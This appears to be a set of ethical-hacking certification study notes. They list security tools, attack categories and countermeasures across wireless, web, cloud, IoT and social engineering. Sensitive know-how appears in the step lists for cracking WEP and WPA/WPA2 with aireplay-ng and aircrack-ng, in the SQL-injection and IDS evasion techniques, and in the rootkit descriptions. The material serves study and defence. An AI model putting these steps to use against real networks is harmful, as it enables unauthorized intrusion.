o Cisco Adaptive Wireless Intrusion Prevention System (IPS) - offers advanced network security for dedicated monitoring and detection of wireless network anomalies, unauthorized access, and RF attacks o AirMagnet WiFi Analyzer o RFProtect o Fern Wifi Cracker o OSWA-Assistant o Zebra's AirDefense o FruityWifi
Wi-Fi Predictive Planning Tool
o Cisco Prime Infrastructure o AirTight Planner o LANPlanner o RingMaster Software o Ekahau Site Survey (ESS) o Connect EZ Turnkey Wireless LAN Bundle o TamoGraph Site Survey o NetSpot o Wi-Fi Designer
IoT Pen Testing
o Close unused ports and unnecessary /unknown open ports o Disable unnecessary service o Provide protection against unauthorized access and usage of the device o Design a mechanism for uninterrupted flow of info between two endpoints o Provide protection against elevation of privileges o Enhanced the device's data encryption policy o Enhance the security of web application and provide data privacy o Harden the overall device's security
Popular Certification Authority
o Comodo - offers a range of PKI digital certificates with strong SSL encryption available 128/256 with SGC (Server-Gated Cryptography) o IdenTrust - a trusted third party that provides certification authority services for many sectors like banks, corporate, government, and healthcare. o Symantec Corporation (NASDAQ: SYMC) - provides solutions that allow companies and consumers to engage in communications and commerce online with confidence. o GoDaddy - SSL Certificates offer a complete range of certificates that comply with CA/Browser Forum guidelines
Web Service Attack Countermeasures
o Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages o Use document-centric authentication credentials that use SAML o Use multiple security credentials such as X.509 Cert, SAML assertions, and WS-Security o Deploy web services-capable firewalls capable of SOAP and ISAPI level filtering o Configure firewalls/IDS systems for a web services anomaly and signature detection o Configure firewalls/IDS systems to filter improper SOAP and XML syntax o Implement centralized in-line requests and responses schema validation o Block external references and use pre-fetched content when de-referencing URLs o Maintain and update a secure repository of XML schemas
Security Misconfiguration Countermeasures
o Configure all security mechanisms and disable all unused services o Setup roles, permissions, and accounts and disable all default accounts or change their default passwords o Scan for latest security vulnerabilities and apply the latest security patches o Non-SSL requests to web pages should be redirected to the SSL page o Set the 'secure' flag on all sensitive cookies o Configure SSL provider to support only strong algorithms o Ensure the certificate is valid, not expired, and matches all domains used by the site o Backend and other connections should also use SSL or other encryption technologies
Different types of data connectivity attacks
o Connection String Injection: -A delegated authentication environment in which attackers inject parameters in a connection string by appending them with the semicolon. This can occur when dynamic string concatenation is used to build connection strings according to user input. o Connection String Parameter Pollution (CSPP) Attacks: -Attackers overwrite parameter values in the connection string. --hash stealing --port scanning --hijacking web credentals o Connection Pool DoS: Attackers examine the connection pooling settings of the target application, construct a large malicious SQL query, and run multiple queries simultaneously to consume all connections in the connection pool, in turn causing database queries to fail for legitimate users
Asymmetric Encryption Strength
o Convenient to use as distribution of keys to encrypt the messages is not required o Enhanced security as one need not share or transmit private keys to anyone o Provides digital signatures that can't be repudiated
Pen Testing for General Wi-Fi Network Attack
o Create a rogue access point o Deauthenticate the client using tools such as Karma and aireplay-ng, and then check for client deauthentication o If client is deauthenticated, then associate with the client, sniff the traffic and check if passphrase/ certificate is acquired, or else try to deauthenticate the client again o If passphrase is acquired, then crack the passphrase using the tool wzcook to steal confidential information or else try to deauthenticate the client again
Attack Web App Client
o Cross-Site Scripting o Redirection Attacks o HTTP Header Injection o Frame Injection o Request Forgery Attack o Session Fixation: o Privacy Attacks: o ActiveX Attacks -Attackers lure victims via email or via a link that attackers have constructed in such a way that loopholes of remote execution code become accessible, allowing the attackers to obtain access privileges equal to that of an authorized user
IoT Threats
o DDoS attacks o Attack on HVAC systems o Rolling code attack o BlueBorn attack o Jamming attack o Remote access using backdoor o Remote access using Telnet o Sybil attack o Exploit kits o MITM o Replay attack o Forged malicious device o Side channel attack o Ransomware
DNA has two modules
o DNA Server Interface - gives the process of all jobs the DNA server is executing -• Current jobs: The current job queue consists of all jobs added to the list by the controller. -• Finished jobs: The finished job list provides information about the decryption jobs including the password. o DNA Client Interface -helps the client statistics to coordinate easily, and is available on machines with the pre-installed DNA client applicatio
Cloud Computing Threats
o Data Breach/Loss o Abuse and Nefarious Use of Cloud services o Insecure Interfaces and APIs o Insufficient Due Diligence o Shared Technology Issues o Unknown Risk Profile o Unsynchronized System Clocks o Inadequate Infrastructure Design and Planning o Conflicts between Client Hardening Proc o Malicious Insiders o Illegal Access to the Cloud o Loss of Business Reputation due to Co-tenant Activiti o Privilege Escalation o Natural Disaster o Hardware Failure o Supply Chain Failure o Modifying Network Traffic o Isolation Failur o Cloud Provider Acquisition o Management Interface Compromise o Network Management Failure o Authentication Attacks o VM-Level Attacks o Lock-in o Licensing Risk o Loss of Governance o Loss of Encryption Key o Risks from Changes of Jurisdiction o Undertaking Malicious Probes or Scan o Theft of Computer Equip o Cloud Service Termination or Failure o Subpoena and E-Discovery o Improper Data Handling and Disposable o Loss/Modification of Backup Data o Compliance Risks o Eonomic Denial of Sustainability (EDoS)
Social Networking Threats to Corporate Networks
o Data Theft: o Involuntary Data Leakage: o Targeted Attacks: o Network Vulnerability o Spam and Phishing: o Modification of Content o Malware Propagation: o Business Reputation o Infrastructure and Maintenance Costs: o Loss of Productivity
Pen Testing LEAP Encrypted WLAN
o Deauthenticate the client using tools such as Karma and aireplay-ng o If client is deauthenticated, then break the LEAP encryption using tools such as Asleap, and THC-LEAPcracker to steal confidential information or else try to deauthenticate the client again
Pen Testing WPA/WPA2 Encrypted WLAN
o Deauthenticate the client using tools such as Karma and aireplay-ng. o If client is deauthenticated, sniff the traffic and then check the status of capturing EAPOL handshake or else try to deauthenticate the client again o If EAPOL handshake is captured, then perform PSK dictionary attack using tools such as coWPAtty and Aircrack-ng to steal confidential information or else try to deauthenticate the client again
Directory Traversal Countermeasure
o Define access rights to the protected areas of the website o Apply checks/hot fixes that prevent the exploitation of the vulnerability such as Unicode to affect the directory traversal o Web servers should be updated with security patches in a timely manner
How to Block Rogue AP
o Deny wireless service to new clients by launching a denial-of-service attack (DoS) on the rogue AP. o Block the switch port to which AP is connected or manually locate the AP and pull it physically off the LAN.
Categories of security control
o Deterrent controls - These controls reduce attacks on the cloud system. Example: Warning sign on the fence or property to inform adverse consequences for potential attackers if they proceed to attack. o Preventive controls - These controls strengthen the system against incidents, probably by minimizing or eliminating vulnerabilities. Example: Strong authentication mechanism to prevent unauthorized use of cloud systems. o Detective controls - These controls detect and react appropriately to the incidents that happen. Example: Employing IDSs, IPSs, etc. helps to detect attacks on cloud systems. o Corrective controls - These controls minimize the consequences of an incident, probably by limiting the damage.
IoT Communication Models
o Device-to-Device Model o Device-to-Cloud Model o Device-to-Gateway Model o Back-End Data-Sharing Model
Other Web Application Threats
o Directory Traversal o Unvalidated Redirects and Forwards o Waterhole Attack o Cross-Site Request Forgery o Cookie/Session Poisoning o Web Services Attacks
How to Defend Against IoT Hacking
o Disable the "guest" and "demo" user accounts if enabled o Use the "Lock Out" feature to lock out accounts for excessive invalid login attempts o Implement strong authentication mechanism o Locate control system networks and devices behind firewalls, and isolate them from the business network o Implement IPS and IDS in the network o Use VPN architecture for secure communication o Deploy security as a unified, integrated system o Allow only trusted IP addresses to access the device from the Internet o Disable telnet (port 23) o Disable UPnP port on routers
Wireless Pen Testing Framework
o Discover wireless devices o If wireless device is found, document all the findings o If the wireless device is found using Wi-Fi network, then perform general Wi-Fi network attack and check if it uses WEP encryption o If WLAN uses WEP encryption, then perform WEP encryption pen testing or else check if it uses WPA/WPA2 encryption o If WLAN uses WPA/WPA2 encryption, then perform WPA/WPA2 encryption pen testing or else check if it uses LEAP encryption o If WLAN uses LEAP encryption, then perform LEAP encryption pen testing or else check if WLAN is unencrypted o If WLAN is unencrypted, then perform unencrypted WLAN pen testing or else perform general Wi-Fi network attack
Bluetooth Discoverable Modes
o Discoverable mode - other devices are visible to other Bluetooth-enabled devices o In limited discoverable mode - the Bluetooth devices are discoverable only for a limited period, for a specific event, or during temporary conditions o non-discoverable mode - prevents that device from appearing on the list during a Bluetooth-enabled device search process
Countermeasure an organization should take
o Disseminate policies among employees and provide proper education and training. Specialized training benefits employees in higher-risk positions against social engineering threats. o Obtain employees' signatures on a statement acknowledging that they understand the policies. o Define the consequences of policy violation.
Sensitive Data Exposure Countermeasure
o Do not create or use weak cryptographic algorithms o Generate encryption keys offline and store them securely o Ensure that encrypted data stored on disk is not easy to decrypt
Web Server Attacks
o DoS/DDoS Attacks o DNS attacks -Hijacking - Amplification o Directory Tranversal Attack o MiTM/ Sniffinng Attack o Phishing o Website Defacemnt o Web Server Misconfiguration o HTTP Response-Splitting Attack o Web Cache Poisoning Attack o SSH Brute Force Attack o Web Server Password Cracking -Guessing -Dictionary - Brute Force -Hybrid o Web Application Attack -Parameter/Form Tampering -Cookie Tampering -Unvalidated Input and File Injection Attacks -SQL Injection Attacks -Session Hijacking -Directory Traversal -DoS and XSS -Buffer Overflow -CSRF -Command Injection -Source Code Disclosure
Cloud Computing Benefits
o Economic o Operational o Staffing o Security
Impact of Social Engineering Attack on Organization
o Economic Losses o Damage to Goodwill o Loss of Privacy o Dangers of Terrorism o Lawsuits and Arbitration o Temporary or Permanent Closure:
Wireless Hacking Tools
o Elcomsoft Wireless Security Auditor o WepAttack o Wesside-ng o coWPAtty o Reaver Pro o WepCrackGui o WEPCrack o WepDecrypt o Portable Penetrator o KisMAC
Best Practices for Securing Cloud
o Enforce data protection, backup, and retention mechanisms o Enforce SLAs for patching and vulnerability remediation o Vendors should regularly undergo AICPA SAS 70 Type II audits o Verify one's cloud in public domain blacklists o Enforce legal contracts in employee behavior policy o Prohibit user credentials sharing among users, applications, and services o Implement secure authentication, authorization, and auditing mechanisms o Check for data protection at both design and runtime o Implement strong key generation, storage and management, and destruction practices o Monitor the client's traffic for any malicious activities o Prevent unauthorized server access using security checkpoints o Disclose applicable logs and data to customers o Analyze cloud provider security policies and SLAs o Assess security of cloud APIs and also log customer network traffic o Ensure that cloud undergoes regular security checks and updates
Wired Communication
o Ethernet o Multimedia over Coax Alliance MoCA o Power-line Communication PLC
Perform Blind SQL Injection
o Exploitation (MySQL) o Extract database user o Extract database name o Extract column name o Extract data from ROWS
Types of Wireless Networks
o Extension to wired o Multiple APs o LAN-to-LAN wireless o 3G/4G Hotspot
Symmetric Encryption Strengths
o Faster and easier to implement as same key is used to encrypt and decrypt data and also requires less processing power. Could be implemented in Application Specific Integrated Chip (ASIC). o Prevents widespread message security compromise as different secret key is used to communicate with different party o Key is not bound to the data being transferred on the link; therefore, even if data is intercepted it is not possible to decrypt it.
Reasons for Insider Attacks
o Financial Gain o Steal Confidential Data o Revenge o Become Future Competitors o Perform Competitors Bidding o Public Announcement
Hacking Methodology
o Footprint web infrastructure o Attack web servers o Analyze web applications o Bypass client-side controls o Attack authentication mechanisms o Attack authorization schemes o Attack access controls o Attack session management mechanisms o Perform injection attacks o Attack application logic flaws o Attack database connectivity o Attack web app clients o Attack web service
What does TLS Record Protocol Manage
o Fragments outgoing data into manageable blocks and reassembles incoming data o Optionally compresses outgoing data and decompresses incoming data o Applies Message Authentication Code (MAC) to the outgoing data and uses MAC to verify the incoming data o Encrypts outgoing data and decrypts incoming dat (*note* - The record protocol sends the outgoing encrypted data to TCP layer for transport.)
Wireless Terminologies
o GSM o Bandwidth o BSSID o ISM Band o Access Point (AP) o Hotspot o Association o Service Set Identifier (SSID) o Orthogonal Frequency-division Multiplexing (OFDM) o Multiple input, Multiple output (MIMO-OFDM) o Direct Sequence Spread Spectrum (DSSS) o Frequency-hopping Spread Spectrum (FHSS)
RSA Key Generation
o Generate two large distinct primes p and q arbitrarily, each roughly the same bit length o Compute n = pq and φ = (p-1)(q-1)
Rootkits Tools
o Horse Pill - Linux kernel rootkit- resides in initrd. Three main parts -klib -c-horsepill.patch -This is a patch to klibc, which provides run-init, which on modern Ubuntu systems runs the real init, systemd -horsepill_setopt - This script takes in command-line arguments and puts them into the section referred to above. -horsepill_infect- This will take the file to splat over run-init while assembling ramdisks as a command line argument. o GrayFish - Win kernel rootkit- injects code into boot record, provides mechanism, hidden storage & cmd execution o Sirefef - aka ZeroAccess- alters internal procs of OS to avoid detection by AV o Necurs - backdoor/remote access, monitors & filters network activity, sends spam, installs rogue security SW
Types of Vuln Assessment Tools
o Host-Based -apt for servers that run various applications such as the web, critical files, databases, directories, and remote accesses. o Depth - used to find and identify previously unknown vulnerabilities in a system. o Application-Layer - designed to serve the needs of all kinds of operating system types and applications. o Scope -provides assessment of the security by testing vulnerabilities in the applications and operating system. o Active/Passive -perform vulnerability checks on the network that consume resources on the network. o Location/Data - Four types of scans network, agent, proxy, cluster
Types of Social Engineering
o Human-based Social Engineering o Computer-based Social Engineering o Mobile-Based Social Engineering
SQL Injection Detection Tools
o IBM Security AppScan o Acunetix Web Vulnerability Scanner o Snort Netsparker Web Application Security Scanner (https://www.netsparker.com) w3af (http://w3af.org) Burp Suite (https://www.portswigger.net) NCC SQuirreL Suite (https://www.nccgroup.com) N-Stalker Web Application Security Scanner (https://www.nstalker.com) Fortify WebInspect (https://software.microfocus.com) WSSA - Web Site Security Scanning Service (https://www.beyondsecurity.com) SolarWinds® Log & Event Manager (https://www.solarwinds.com) AlienVault USM (https://www.alienvault.com) dotDefender (http://www.applicure.com
Types of In-Based SQL Injections
o Illegal/Logically Incorrect Query o Union SQL injection o Error-Based Injections o System Stores procedure o Tautology - uses OR o End-of-line Command -(--) show as o In-line Command - lots of inputs -This type of injections allows an attacker to bypass blacklisting, remove spaces, obfuscate, and determine database versions. o Piggybacked Query -also known as stacked query -adds addtional code to original
Types of Human-based Social Engineering
o Impersonating o Eavesdropping o Shoulder Surfing o Dumpster Diving o Reverse Social Engineering o Piggybacking o Tailgating o Vishing
Code Access Security
o Implement secure coding practices to avoid source code disclosure and input validation attack. o Restrict code access security policy settings to ensure that code downloaded from the Internet or intranet has no permissions to execute. o Configure IIS to reject URLs with "../" to prevent path traversal, lock down system commands and utilities with restrictive access control lists (ACLs), and install new patches and updates. o If targets do not implement code access security in their web servers, then there is a possibility of execution of malicious code.
Application Threats
o Improper data/input validation o Authentication and authorization attacks o Security misconfiguration o Improper error handling and exception management o Information disclosure o Hidden-field manipulation o Broken session management o Buffer overflow issues o Cryptography attacks o SQL injection o Phishing
Three Main types of SQL Injections
o In-Based SQL Injection -uses the same communication channels -commonly used -generic error message o Blind/Inferential SQL Injection -Takes longer -results returned in boolean -can't see results o Out-of-Band SQL Injection -Different communication channels -Difficult to perform
Types of Impersonation
o Posing as a legitimate end user o Posing as an important user o Posing as a technical support o Internal Employee/Client/Vendor o Repairman o Over helpfulness of help desk o Third-party authorization o Tech support o Trusted authority
Types of Signature Evasion Techniques
o In-line Comment: Obscures input strings by inserting in-line comments between SQL keywords. o Char Encoding: Uses built-in CHAR function to represent a character. o String Concatenation: Concatenates text to create SQL keyword using DB specific instructions. o Obfuscated Codes: Obfuscated code is an SQL statement that has been made difficult to understand. o Manipulating White Spaces: Obscures input strings by dropping white space between SQL keyword. o Hex Encoding: Uses hexadecimal encoding to represent a SQL query string. o Sophisticated Matches: Uses alternative expression of "OR 1=1". o URL Encoding: Obscure input string by adding percent sign '%' before each code point. o Case Variation: Obfuscate SQL statement by mixing it with upper case and lower case letters. o Null Byte: Uses null byte (%00) character prior to a string in order to bypass detection mechanism. o Declare Variables: Uses variable that can be used to pass a series of specially crafted SQL statements and bypass detection mechanism. o IP Fragmentation: Uses packet fragments to obscure attack payload which goes undetected by signature mechanism.
Web Server Methodology
o Information gathering o Webserver Footprinting o Website Mirroring o Vulnerabiltiy scanning o Session Hijacking o Web Server Password Hacking
Network Threats
o Information gathering o Sniffing and eavesdropping o Spoofing o Session hijacking o Man-in-the-Middle attack o DNS and ARP poisoning o Password-based attacks o Denial-of-Service attack o Compromised-key attack o Firewall and IDS attack
Types of Cloud Computing Services
o Infrastructure-as-a-Service (IaaS) o Platform-as-a-Service (Paas) o Software -as-a-Service (SaaS)
Physical Security Policies
o Issue identification cards (ID cards), and uniforms, along with other access control measures to the employees of a particular organization. o Office security or personnel must escort visitors into visitor rooms or lounges. o Restrict access to certain areas of an organization in order to prevent unauthorized users from compromising security of sensitive data. o Old documents containing some valuable information must be disposed of by using equipment such as paper shredders and burn bins. This prevents information gathering by attackers using techniques such as dumpster diving. o Employ security personnel in an organization to protect people and property. Assist trained security personnel by alarm systems, surveillance cameras, etc.
Wi-Fi Snffer
o Kismet o Tcpdump o SmartSniff o Acrylic WiFi Professional o NetworkMiner o WifiScanner o Free Network Analyzer
Symmetric Encryption Weakness
o Lack of secure channel to exchange secret key o Difficult to manage and secure too many shared keys that are generated to communicate with different parties o Provides no assurance about origin and authenticity of a message as same key is used by both sender and receiver o Vulnerable to dictionary attacks and brute-force attacks
Challenges of IoT
o Lack of security and privacy o Vulnerable web interfaces o Legal regulatory and rights issues o Default, weak, and hardcoded credentials o Clear text protocol and unnecessary open ports o Coding errors o Storage issues o Difficult to update firmware and OS o Interoperability standard issues o Physical theft and tampering o Lack of vendor support for fixing vulnerabilities o Emerging economy and development issues
How to Defend Against SQL Injection Attacks
o Limit the length of user input o Use custom error messages o Monitor DB traffic using an IDS, WAF o Disable commands like xp_cmdshell o Isolate database server and web server o Always use method attribute set to POST and low privileged account for DB connection o Run database service account with minimal rights o Move extended stored procedures to an isolated server o Use typesafe variables or functions such as IsNumeric() to ensure typesafety o Validate and sanitize user inputs passed to the database
SQL Allows attackers to
o Log into the application without supplying valid credentials o Perform queries against data in the database, often even data to which the application would not normally have access o Modify database contents, or drop the database altogether o Use the trust relationships established between the web application components to access other databases
Online MD5 Decryption Tools
o MD5 Decoder o MD5 Decrypt o MD5 Decrypter o MD5Decrypter o OnlineHashCrack.com o HashKiller.co.uk o Md5.My-Addr.com o cmd5.org o CrackStation o md5this o MD5/Sha1 hash cracker
Hash Calculators for mobiles
o MD5 Hash Calculator - for Android is used to generate the MD5 hash of a string in security. It is useful for encoding passwords, credit-card numbers, and other sensitive data into databases (MySQL, MSSQL, Postgress, or others). o Hash Droid utility helps to calculate a hash from a given text or from a file stored on the device. o Hash Calculator allows users to calculate MD5, SHA1 or CRC32 checksum of files o Hash Calc o Hashr - Checksum & Hash Digest Calculator o HashStamp MD5 & SHA1 Checker o Hash Tools o HashCalc
Host Threats
o Malware attacks o Foot printing o Profiling o Password attacks o Denial-of-Service attacks o Arbitrary code execution o Unauthorized access o Privilege escalation o Backdoor attacks o Physical security threats
Web Application Hacking Tools
o Metasploit o w3af (http://w3af.org) o HTTrack o WebCopier o WPScan o Instant Source o MileSCAN ParosPro o GNU Wget o cURL o HttpBee
Resources for Vuln Research
o Microsoft Vulnerability Research (MSVR) (https://technet.microsoft.com) o Security Magazine (https://www.securitymagazine.com) o SecurityFocus (https://www.securityfocus.com) o Help Net Security (https://www.net-security.org) o HackerStorm (http://www.hackerstorm.co.uk) o SC Magazine (https://www.scmagazine.com) o Computerworld (https://www.computerworld.com) o WindowsSecurity (http://www.windowsecurity.com) o Exploit Database (https://www.exploit-db.com) o CVE Details (https://www.cvedetails.com) o Security Tracker (https://securitytracker.com) o Vulnerability Lab (https://www.vulnerability-lab.com) o D'Crypt (https://www.d-crypt.com) o Trend Micro (https://www.trendmicro.com) o Rapid7 (https://www.rapid7.com) o Dark Reading (https://www.darkreading.com
How to Defend Against Web Server Attacks
o Monitor all ports o Server certificates o Machine.config o Code Access Security o UrlScan
Other Cloud Security Tools
o Nessus Enterprise for AWS o Symantec Cloud Workload Protection o Alert Logic o Deep Security o SecludIT o Panda Cloud Office Protection o Data Security Cloud o Cloud Application Control o Intuit Data Protection Services
Location/Data examined tools
o Network-Based Scanner: interact only with the real machine where they reside and give the report to the same machine after scanning. o Agent-Based Scanner: reside on a single machine but have the ability to scan a number of machines on the same network. o Proxy Scanner: scans networks from any machine in the network. o Cluster scanner: similar to proxy scanners but have the ability to perform two or more scans on different machines simultaneously in the network.
Bluetooth Pairing Modes
o Non-pairable mode: In non-pairable mode, a Bluetooth device rejects the pairing request sent by any device. o Pairable mode: In pairable mode, the Bluetooth device accepts the pairing request upon request and establishes a connection with the pair requesting device.
Characteristics of Cloud Computing
o On-demand self service o Distributed storage o Rapid elasticity o Automated management o Broad network access o Resource pooling o Measured service o Virtualization technology
Wi-Fi Authentication Modes
o Open System o Shared Key o RADIUS
Characteristics of virtualization in cloud computing technology
o Partitioning -The cloud supports many applications and multiple OSs in a single physical system by segregating the available resources o Isolation -Cloud isolates each virtual machine from its host physical system and other virtual machines, so that if one virtual machine fails it does not have any impact on the others as well as on the data sharing o Encapsulation -A virtual machine can be stored as a single file, and thus it can be identified based on its service. Encapsulation protects each application from interfering with other applications
Broken Access Control COuntermeasures
o Perform access control checks before redirecting the authorized user to requested resource o Avoid using insecure Id's to prevent attacker from guessing it o Provide session timeout mechanism o Limit file permissions to authorized users from misuse o Avoid client side caching mechanism o Remove session tokens on server side on user logout
Types of Computer-based Social Engineering
o Phishing o Pop-up window attacks - Hoax Letter -non exist virus threat - Chain Letters - get a gift = Virus o Spam mail o Instant chat messenger
Types of Machines
o Physical Machine -The architecture of a physical machine consists of CPU, memory, NIC, disk, OS, etc. It consumes the complete existing physical resources. o Virtual Machine -A machine that sits on the standard physical resources. These machine have an advantage over physical machine since many OSs, memory allocation, etc. is possible over the existing physical resource. Virtual machines are used effectively in cloud computing environments.
Foortprinting Countermeasures
o Restrict the employees to access social networking sites from organization's network o Configure web servers to avoid information leakage o Educate employees to use pseudonyms on blogs, groups, and forums o Do not reveal critical information in press releases, annual reports, product catalogues and so on. o Limit the amount of information that you are publishing on the website/ Internet o Use footprinting techniques to discover and remove any sensitive information publicly available o Prevent search engines from caching a web page and use anonymous registration services o Develop and enforce security policies such as information security policy, password policy and so on to regulate the information that employees can reveal to third parties o Set apart internal and external DNS or use split DNS, and restrict zone transfer to authorized servers o Disable directory listings in the web servers
General Guidelines for IoT Device Manufacturing Companies
o SSL/TLS should be used for communication purpose o There should be a mutual check on SSL certificates and the certificate revocation list o Use of strong passwords should be encouraged o The device's update process should be simple, secured with a chain of trust o Implementing account lockout mechanisms after certain wrong login attempts to prevent brute force attacks o Lock the devices down whenever and wherever possible to prevent them from attacks o Periodically checking the device for unused tools and using whitelisting to allow only trusted tools or application to run o Use secure boot chain to verify all software that is executed on the device
Vulnerabilty assessment reports cover
o Scan information - provides information such as the name of the scanning tool, its version, and the network ports that have to be scanned. o Target information - contains information about the target system's name and address. o Results: This section provides a complete scanning report. It contains subtopics such as target, services, vulnerability, classification, and assessment. - Target: This subtopic includes each host's detailed information - Services: The subtopic defines the network services by their names and ports. - Classification: This subtopic allows the system administrator to obtain additional information about the scanning such as origin of the scan. - Assessment: This class provides information regarding the scanner's assessment of the vulnerability.
Cryptography Tools for Mobile
o Secret Space Encryptor - is an integrated solution of password manager, message (text) encryption, and file encryption. o Decrypto - is an application that provides a range of encryption and decryption tools. o SealNote - is simple, safe and easy to use notepad application that puts security first. o Encrypt Decrypt o Crypten : Encryption o Cipher Sender
Identity Theft Countermeasures
o Secure or shred all documents containing private information o Ensure your name is not present in the marketers' hit lists o Review your credit card reports regularly and never let it go out of sight o Never give any personal information on the phone o To keep your mail secure, empty the mailbox quickly o Suspect and verify all the requests for personal data o Protect your personal information from being publicized
Radio Frequency Monitoring Tools
o Sentry Edge II o NetworkManager o xosview o CPRIAdvisor o sigX o satID o KWiFiManager o RF Signal Tracker o FieldSENSE o WaveNode o 3M Home Curfew RF Monitoring System o DTC-340 RFXpert
Web Application Firewalls
o ServerDefender VP o IBM Security AppScan o Radware's AppWall o QualysGuard WAF o Barracuda Web Application Firewall o ThreatSentry o ThreatRadar o SecureSphere o ModSecurity o SteelApp Web App Firewall o Trustwave Web Application Firewall o Cyberoam's Web Application Firewall o Kerio Control
Asymmetric Encryption Weaknesses
o Slow in processing and requires high processing power o Widespread message security compromise is possible (i.e., attacker can read his/her complete messages if private key is compromised) o Messages received cannot be decrypted if the private key is lost o Vulnerable to Man-in-the-Middle and brute-force attacks
Defense Strategy
o Social Engineering Campaign - An organization should conduct numerous social engineering exercises using different techniques on a diverse group of people in order to examine how its employees would react to a real social engineering attacks. o Gap Analysis-From the information obtained from the social engineering campaign, evaluation of the organization is based on industry leading practices, emerging threats and mitigation strategies. o Remediation Strategies - Depending upon the result of the evaluation in gap analysis, a detailed remediation plan is developed that would mitigate the weaknesses or the loopholes found in earlier step. The plan focuses mainly on educating and creating awareness among employees based on their roles, potential threats to an organization
Types of Phishing
o Spear phishing - content directed at a specific employee or small group of employees o Whaling - targets high profile executives like CEO, CFO, politicians, and celebrities with complete access to confidential and highly valuable information. o Pharming - attacker executes malicious programs that automatically redirects victim's traffic to a website controlled by the attacker. - DNS Cache Posioning - Host File Modification o Spimming - exploits Instant Messaging platforms and uses IM as a tool to spread spam.
Social Engineering Pen testing tools
o SpeedPhish Framework (SPF) o Gophish o King Phisher o LUCY o MSI Simple Phish o Ghost Phisher o Metasploit o Umbrella o Domain Hunter o Phishing Frenzy o SpearPhisher
How to Break WEP Encryption
o Start the wireless interface in monitor mode on the specific AP channel o Test the injection capability of the wireless device to the AP o Use a tool such as aireplay-ng to do a fake authentication with the AP o Start the Wi-Fi sniffing tool o Start a Wi-Fi packet encryption tool such as aireplay-ng in ARP request replay mode to inject packets o Run a cracking tool such as Cain & Abel or aircrack-ng
Steganalysis Methods & Attacks on Stego
o Stego only In this attack, the staganalyst needs to try every possible steganography algorithm and related attack to recover the hidden information. o Known stego This attack allows attacker to know the steganography algorithm as well as original and stego-object. o Known message presumes that the message and the stego-medium are available one can detect the technique used to hide the message. o Known cover Attackers use the known-cover attack when they have knowledge of both the stego-object and the original cover-medium. this will enable a comparison between both the mediums in order to detect the changes in the format of the medium and find the hidden message. o Chosen message The steganalyst uses known message to generate a stego-object by using some steganography tool in order to find the steganography algorithm used for hiding the information o Chosen stego This attack takes place when the steganalyst knows both a stego object and steganography tool or algorithm used to hide the message.
Anti-Rootkits
o Stinger -McAfee Stinger is a standalone utility used to detect and remove specific viruses. It helps administrators and users when dealing with an infected system. Stinger performs rootkit scanning, and scan performance optimizations. o Avast Free Antivirus o TDSSKille o Malwarebytes Anti-Rootkit o Rootkit Buster o UnHackMe o Virus Removal Tool o F-Secure Anti-Virus o Avira Free Antivirus o SanityCheck o Webroot o GMER
Types of virtualization
o Storage Virtualization It combines storage devices from multiple networks into a single storage device and helps in: -• Expanding the storage capacity -• Making changes to store configuration easy o Network Virtualization It combines all network resources, both hardware, and software into a single virtual network and is used to: -• Optimize reliability and security -• Improves network resource usage o Server Virtualization It splits a physical server into multiple smaller virtual servers. Storage utilization is used to: -• Increase the space utilization -• Reduces the hardware maintenance cost
How to Defend Against File Injection Attacks
o Strongly validate user input o Consider implementing a chroot jail o PHP: Disable allow_url_fopen and allow_url_include in php.ini o PHP: Disable register_globals and use E_STRICT to find uninitialized variables o PHP: Ensure that all file and streams functions (stream_*) are carefully vetted
WPA2
o Supports Counter Mode w/ Cipher Block Chaining o Message Authentication Code Protocol (CCMP), an AES-based encryption mode with strong security. Modes of Operations o Personal- Pre-shared key (PSK) -router uses the combination of passphrase, network SSID, and TKIP to generate a unique encryption key for each wireless client. -changes constantly o Enterprise- EAP or RADIUS (token cards, Kerberos, certificates) -Users are allocated login credentials by a centralized server
Types of Cryptography
o Symmetric Encryption o Asymmetric Encryption
Evasion Technique: IP Fragmentation
o Take a pause in sending parts of an attack with a hope that an IDS would time-out before the target computer does o Send the packets in reverse order o Send the packets in proper order except the first fragment which is sent in the last o Send the packets in proper order except the last fragment which is sent in the first o Send packets out of order or randomly
How a virus infects a system
o The virus loads itself into memory and checks for the executable on the disk. o The virus appends malicious code to a legitimate program without the permission or knowledge of user. o The user is unaware of the replacement and launches the infected program. o The execution of an infected program also infects other programs in the system. o The above cycle continues until the user realizes there is an anomaly in the system
Common Techniques Attackers Use to Obtain Personal Information for Identity Theft
o Theft of wallets, computers, laptops, cell phones, backup media, and other sources of personal informatio o Internet Searches o Pretexting - Fraudsters may pose as executives from financial institutions, telephone companies, and so on, who rely on "smooth talking" and win the trust of an individual to reveal sensitive information o Hacking o Keloggers and passowrd stealers (malware) o Wardriving o Mail Theft and Rerouting
Passive footptrinting techiques
o Through seearch engines o Top-level Domains (TLDs) and sub-domains through web services o get location through web services o people search using social networking sites and people search services o financial information through financial services o infrastructure details through job sites o Monitoring target using alert services o Gathering information using groups, forums, and blogs o Determining the operating systems in use by the target organization o Extracting information about the target using Internet archives o Competitive intelligence o Monitoring website traffic of the target o Tracking the online reputation of the target o Collecting information through social engineering on social networking sites
Social Engineering Countermeasures
o Train Individuals on Security Policies o Implement Proper Access Privileges o Presence of Proper Incidence Response Time o Availability of Resources Only to Authorized Users o Scrutinize Information: . o Background Check and Proper Termination Process: o Anti-Virus/Anti-Phishing Defenses: o Implement Two-Factor Authentication o Adopt Documented Change Management o Ensure a Regular Update of Software
Criteria for Vuln Assessment Tools
o Types of vulnerabilities being assessed: o Testing capability of scanning: o Ability to provide accurate reports: o Efficient and accurate scanning: o Capability to perform smart search: o Functionality for writing own tests o Test run scheduling
How to Defend Against KRACK Attacks
o Update all the routers and Wi-Fi devices with the latest security patches o Turn On auto updates for all the wireless devices and patch the device firmware o Avoid using public Wi-Fi networks o Browse only secured websites and do not access sensitive resource when your device is connected to an unprotected network o If you own IoT devices, audit the devices and do not connect to the insecure Wi-Fi routers o Always enable HTTPS Everywhere extension o Make sure to enable two factor authentication
Side-channel-attack mitigation techniques
o Use Differential Power Analysis (DPA) proof protocols with delimited side-channel leakage characteristics and update keys before leakage accumulation is significant o Use Fixed-time algorithms (i.e., no data-dependent delays) o Mask and blind algorithms using random nonces o Implement differential matching techniques to minimize net data-dependent leakage from logic-level transitions o Pre-charge registers and busses to remove leakage signatures from predictable data transitions o Add amplitude or temporal noise to reduce the attacker's signal-to-noise ratio
How to Defend Against Wireless Attacks: SSID settings
